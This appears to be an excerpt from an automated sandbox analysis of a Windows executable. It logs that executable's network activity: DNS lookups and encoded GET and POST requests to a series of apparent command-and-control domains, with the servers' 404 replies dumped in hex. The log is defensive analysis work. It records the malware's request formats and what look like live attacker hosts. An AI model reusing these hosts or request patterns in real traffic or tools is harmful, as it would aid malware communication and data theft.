            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /i7xp/?-L=kBMxZFRpAD6P&gP=1hYOXgym/+H9levAkr4ECV6rOYKZY3gLAuBEPSFmNBWW1UoBGm7krMakoIf2T8PCbakGk5cJYsK9Iz90f+By3ei+nF7KhZYXgTY0pVgzUu8kB5fl+xjkuOc= HTTP/1.1Host: www.whats-in-the-box.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8z5k/?gP=y1aGUeBTtCWB8PYjxeZy4U2j9UMFcfikuJGyOOgv6AsofEnOPQxTGp57UW4jl24PiU2QUCC/WnCbrv11FxPlakKzrkp/pGyXsuE4toY6QkeuA/Y2UZTirzw=&-L=kBMxZFRpAD6P HTTP/1.1Host: www.1183377.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4i87/?-L=kBMxZFRpAD6P&gP=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVpZIGkHJVy9sLRLBvFWiGcqamlVlCdw8MyQ8= HTTP/1.1Host: www.52ywq.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /d8cw/?gP=ygF20N1+ik7kBOtBXXgSSDl+0mvoPS6R8XEst5j0lvkfFXMCnxh1w4hdkVa8euGiR7K2W9wNoXO2NDH8py5otm2v66eMoudDkD1QDiauZF6PALhNXvt3BHI=&-L=kBMxZFRpAD6P HTTP/1.1Host: www.zenscape.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /jsqu/?-L=kBMxZFRpAD6P&gP=j6JGavFFAQYaoSsk3MdZismLyTuecDBS/zrFTn0tpA7YEGIVc6EsUszyewNJDeJ1aRTf+dmReaRifudBLpLuAECuXdbdVwd/lx4BGGAWHgBLP9AhssTD5eI= HTTP/1.1Host: www.asociacia.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /jyeu/?gP=KiLVsdjbhLGFnrJehKTzSS0IkzcAWv/LJ+iUpFrqUMB7t1Dgy4rxQKgK0ZJ2vypsgoxK5tfcGeo5lfiWWTY3/QPGqQrPglnah1puMp4IzQunG6SYXgyDdEY=&-L=kBMxZFRpAD6P HTTP/1.1Host: www.93187.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /abla/?gP=R9BPGtjeoV0CDxCBeHwugo2BsPFWgaNdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIP+nYbA/MCobApDN+18WI9d8e3Vo/1w2CbZc=&-L=kBMxZFRpAD6P HTTP/1.1Host: www.tempatmudisini01.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xweg/?-L=kBMxZFRpAD6P&gP=zyGgAOIUWHAkjy53XOab1MtcQdyBzOoJaxZIhC+JlO6DnbZYVfn3Wlg6Cuq4vonK+0ubeBxTnsDOaX+bBTk8d8gi4CXplyUvpH+a6MWSZKg7Sn8a+cnOgQs= HTTP/1.1Host: www.o731lh.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2ho9/?gP=sZDoihg8ajsFNu4sFB4wVMG24nWUkQUSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3H5WrA65sHfIkn+XzJEmDgF1B4fp1cD4x67M=&-L=kBMxZFRpAD6P HTTP/1.1Host: www.consultarfacil.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8o1o/?-L=kBMxZFRpAD6P&gP=QunhVm6kZFQCJjGkuC7lsmN7UDLhVH5unS34CwGNyhG42F+U2Qq2Bbej6HS9mh+MEeKFfLAj85iyVJ5CsJDjT9kB1XQFiuYG2+iOt7QfZQyJLxqfhY4aAGU= HTTP/1.1Host: www.broomeorchard.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4est/?gP=6TioOITzTznuWaHCUWnl//RNTiJIkSIqdx+6cQbbG9CbTHyFxDml283eSUfpT4rPWLRehJ5KDSFFDUFbTukXlY89F3XW39p23v05UDH3lWqOp67DGsRlWdM=&-L=kBMxZFRpAD6P HTTP/1.1Host: www.suarahati20.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8qne/?-L=kBMxZFRpAD6P&gP=KTDLAip6979182YpgYgwlP0twqrvN2KjRu9dlBr1KRF7u6Oe/Vup1PLCUBiG85sopIJcMB3IBfxfJF1E2Fdczwn6nM8FHB3uPZpUzCEofVeYgOE3F6jmTm8= HTTP/1.1Host: www.nmh6.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.whats-in-the-box.org
            Source: global trafficDNS traffic detected: DNS query: www.1183377.app
            Source: global trafficDNS traffic detected: DNS query: www.52ywq.vip
            Source: global trafficDNS traffic detected: DNS query: www.zenscape.top
            Source: global trafficDNS traffic detected: DNS query: www.asociacia.online
            Source: global trafficDNS traffic detected: DNS query: www.93187.xyz
            Source: global trafficDNS traffic detected: DNS query: www.insicilia.today
            Source: global trafficDNS traffic detected: DNS query: www.tempatmudisini01.click
            Source: global trafficDNS traffic detected: DNS query: www.o731lh.vip
            Source: global trafficDNS traffic detected: DNS query: www.consultarfacil.online
            Source: global trafficDNS traffic detected: DNS query: www.broomeorchard.xyz
            Source: global trafficDNS traffic detected: DNS query: www.suarahati20.xyz
            Source: global trafficDNS traffic detected: DNS query: www.nmh6.site
            Source: unknownHTTP traffic detected: POST /8z5k/ HTTP/1.1Host: www.1183377.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 199Origin: http://www.1183377.appReferer: http://www.1183377.app/8z5k/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36Data Raw: 67 50 3d 2f 33 79 6d 58 72 5a 75 73 51 2f 74 72 2b 34 33 68 4f 5a 54 39 46 6d 68 35 33 41 64 48 38 6d 51 6b 64 75 67 41 4e 49 5a 7a 58 52 62 4a 55 66 55 5a 46 6c 49 45 4b 64 32 61 43 38 68 6c 46 42 2f 76 53 65 57 63 78 32 30 58 44 43 36 6e 63 70 6e 45 78 61 65 5a 78 57 33 67 57 4a 71 6d 42 36 57 75 4f 78 73 72 36 55 55 56 30 37 6b 53 2b 56 68 64 5a 6e 47 31 43 6f 42 35 50 61 72 6f 79 78 48 46 4d 51 58 4e 41 2f 6a 62 5a 78 4b 43 39 72 6e 50 49 72 6a 37 6d 35 61 37 67 45 63 45 4f 68 75 36 59 66 43 4a 70 54 73 58 54 63 43 70 47 6f 68 33 76 64 6c 79 7a 6e 43 71 68 77 5a 49 37 58 6e 5a 67 3d 3d Data Ascii: gP=/3ymXrZusQ/tr+43hOZT9Fmh53AdH8mQkdugANIZzXRbJUfUZFlIEKd2aC8hlFB/vSeWcx20XDC6ncpnExaeZxW3gWJqmB6WuOxsr6UUV07kS+VhdZnG1CoB5ParoyxHFMQXNA/jbZxKC9rnPIrj7m5a7gEcEOhu6YfCJpTsXTcCpGoh3vdlyznCqhwZI7XnZg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:55:39 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:55:42 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:55:45 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 13:55:47 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 774X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound">
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:55:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 61 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 25 8d 28 58 68 e3 17 e4 dc f5 12 c8 6d 8e 18 c1 fb 7b 13 bd 03 b1 b6 b4 dc 99 37 c3 b0 e8 72 1f cc 72 81 8e 2d 19 cc 3e 07 36 cd ba 81 53 cc b0 8f 77 21 d4 6f 11 f5 0b 29 68 1b 69 ac 91 0b 4b e6 64 d0 6d be 13 45 41 3d d9 b5 bb 40 d3 25 9d 97 c7 a7 a7 e7 36 3d 2f 59 29 05 16 06 4b e4 a5 83 1c 81 fc cd b6 81 e1 78 3e ec c0 0a c1 d6 a5 d8 33 5c 93 67 a1 30 02 a7 14 53 49 74 0c 4a d5 65 ff 8a 5f fe e2 09 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: aa1D{X? D%(Xhm{7rr->6Sw!o)hiKdmEA=@%6=/Y)Kx>3\g0SItJe_'$0
